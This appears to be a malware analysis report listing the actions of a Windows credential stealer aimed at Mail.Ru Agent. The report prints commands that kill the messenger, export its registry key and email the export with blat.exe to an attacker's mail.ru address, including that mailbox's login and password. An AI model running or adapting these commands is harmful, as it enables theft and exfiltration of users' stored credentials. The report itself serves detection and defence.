Technical Information
- %TEMP%\1.tmp\blat.exe -body PassReg -to magistrr65@mail.ru -attach ver.txt,Mail.Ru.reg
- %TEMP%\1.tmp\blat.exe -install -server smtp.mail.ru -port 25 -f magistrr65@mail.ru -u magistrr65@mail.ru -pw kbdthgekm1945
- %WINDIR%\regedit.exe -ea Mail.Ru.reg "HKEY_CURRENT_USER\Software\Mail.Ru\Agent"
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\xcopy.exe "%APPDATA%\Mra\Update\ver.txt" /c/h/y/q
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Rabot.bat" <Current directory>\"
- <SYSTEM32>\taskkill.exe /f /im "magent.exe"
- magent.exe
- %TEMP%\1.tmp\blat.lib
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\Rabot.bat
- %TEMP%\1.tmp\blat.exe
- '94.##0.191.201':25
- DNS ASK sm##.mail.ru
- DNS ASK ya.ru
- '<Private IP address>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: '' WindowName: ''